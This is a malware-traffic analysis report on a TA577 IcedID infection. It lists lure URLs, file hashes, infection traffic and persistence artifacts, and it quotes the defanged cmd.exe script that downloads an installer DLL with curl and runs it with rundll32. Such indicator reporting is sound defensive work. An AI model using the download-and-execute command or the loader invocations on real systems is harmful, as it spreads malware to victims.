Malware-Traffic-Analysis.net - 2023-10-16 - TA577 IcedID (Bokbot) infection

2023-10-16 (MONDAY) - TA577 ICEDID (BOKBOT) INFECTION

NOTICE:
Of note, the zip archives on this page have been updated, and they now use the new password scheme. For the new password, see the "about" page of this website.
ASSOCIATED FILES:
2023-10-16-IOCs-from-TA577-IcedID-infection.txt.zip 2.2 kB (2,216 bytes)
2023-10-16-IcedID-infection.pcap.zip 4.4 MB (4,388,407 bytes)
2023-10-16-TA577-IcedID-malware-and-artifacts.zip 2.3 MB (2,290,844 bytes)
2023-10-16 (MONDAY) - TA577 ICEDID (BOKBOT) INFECTION

INFECTION CHAIN:

- thread-hijacked email --> link for zip download --> downloaded zip --> extracted .js file --> 
  retrieves IcedID installer --> IcedID infection with BackConnect traffic

SOME URLS FROM EMAILS FOR THE INITIAL ZIP ARCHIVE REPORTED TO URLHAUS:

- hxxps[:]//flashnewsbensedira[.]com/el/
- hxxps[:]//pakistan1[.]tv/sui/
- hxxps[:]//clautedomex[.]mx/iis/
- hxxps[:]//keramatfarm[.]net/tdei/
- hxxps[:]//agriformexico[.]com/puae/
- hxxps[:]//axioworldwide[.]com/umu/
- hxxps[:]//ptbolaterbaik[.]com/ed/
- hxxps[:]//talhaislam[.]com/saes/
- hxxps[:]//infocuankerajaan[.]co/qu/
- hxxps[:]//alpscoating[.]com/oarm/
- hxxps[:]//bombaycasuals[.]com/tmpr/
- hxxps[:]//i9fqe[.]com/E/

- Note: The above URLs are not the full URLs, but they would download the initial zip, when active.

EXAMPLE OF DOWNLOADED ZIP ARCHIVE AND EXTRACTED .JS FILE:

- SHA256 hash: d9fd1583c77e3bb4baabb40f8609d00fc9234747eefae82d9662e59778162a38
- File size: 86,168 bytes
- File name: vdh.zip
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- File description: zip archive retrieved from link in a TA577 email

- SHA256 hash: fcada920fd63cd4f32710660f5ecec14ac894c919dfbfea7ed5725b679de477a
- File size: 424,446 bytes
- File name: opt-20.js
- File type: ASCII text, with very long lines (65536), with no line terminators
- File description: scrip file extracted from the above zip archive

COMMAND SCRIPT RUN BY THE ABOVE .JS FILE:

  "C:\Windows\System32\cmd.exe" /c ec || eCho ec &
  PING ec || cURL hxxp[:]//198.98.61[.]173/Ftn/level -o %TMP%\ec.log &
  PING -n 2 ec || ruNDlL32 %tmp%\ec.log scab /k haval462 &
  EXIT prqiAmUavMTcuG=

TRAFFIC FROM AN INFECTION:

- Date/Time (UTC)      Destination IP     Port  Domain               Info
  -------------------  -----------------  ----  -------------------  ------------------------------------------------
- 2023-10-16 18:30:59  198.99.61[.]173    80    198.99.61[.]173      GET /Ftn/level  <-- returned installer DLL
- 2023-10-16 18:31:03  104.21.7[.]13      80    aptekoagraliy[.]com  GET /            <-- fake gzip binary
- 2023-10-16 18:31:04  104.248.81[.]48    443   joekairbos[.]com     Client Hello  <-- post-infection HTTPS C2 starts
- 2023-10-16 18:32:04  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 18:32:05  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 18:32:05  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 18:32:05  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 18:32:06  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 18:32:07  159.89.124[.]188   443                       <-- start of TCP traffic for IcedID BackConnect
- 2023-10-16 18:32:07  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 18:37:05  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 18:42:23  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 18:47:24  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 18:52:25  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 18:56:13  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 18:58:24  104.223.118[.]109  443   seedkraproboy[.]com  Client Hello
- 2023-10-16 18:58:26  104.223.118[.]109  443   seedkraproboy[.]com  Client Hello
- 2023-10-16 18:59:00  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 18:59:32  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:00:38  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:01:44  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:02:50  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:03:56  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:04:36  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:05:02  91.193.18[.]135    443   drignyaffk[.]com     Client Hello
- 2023-10-16 19:05:12  151.236.9[.]107    443   lazirusairnaf[.]com  Client Hello
- 2023-10-16 19:05:48  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 19:06:08  104.248.81[.]48    443   joekairbos[.]com     Client Hello
- 2023-10-16 19:06:24  104.223.118[.]109  443   seedkraproboy[.]com  Client Hello
- 2023-10-16 19:11:40  104.223.118[.]109  443   seedkraproboy[.]com  Client Hello

MALWARE/ARTIFACTS FROM AN INFECTION:

- SHA256 hash: 9814a8f9f29e6efb4a7896f61ced334cc5567c3aa61a66325eca76360f1226b4
- File size: 808,625 bytes
- File location: hxxp[:]//198.99.61[.]173/Ftn/level
- File location: C:\Users\[username]\AppData\Local\Temp\ec.log
- File type: PE32+ executable (DLL) (console) x86-64, for MS Windows
- File description: Retrieved and run by above .js file, this is a DLL installer for IcedID
- Run method: rundll32 [filename] scab /k haval462

- SHA256 hash: e05a450089cea22daae866154a5fcb5e043e4f9456ccb079e40c79f716c1db25
- File size: 1,143,404 bytes
- File location: hxxp[:]//aptekoagraliy[.]com/
- File type: gzip compressed data, was "Jeans.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 4835498
- File description: fake gzip binary used to create persistent IcedID DLL and license.dat data binary

- SHA256 hash: 332afc80371187881ef9a6f80e5c244b44af746b20342b8722f7b56b61604953
- File size: 354,474 bytes
- File location: C:\Users\[username]\AppData\Roaming\PrintVehicle\license.dat
- File type: data
- File description: data binary needed to run persistent IcedID DLL

- SHA256 hash: b6ae99f5eea0c2df141c823f38d1ce065a0ba4dc331f219071bf480221f61d7a
- File size: 788,176 bytes
- File location: C:\Users\[username]\AppData\Local\ewevex\Haikvamk32.dll
- File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
- File description: Persistent DLL for IcedID infection
- Run method: rundll32 [filename],init --itma="[path to license.dat]"
IMAGES

Shown above: Traffic from the infection filtered in Wireshark.
Click here to return to the main page.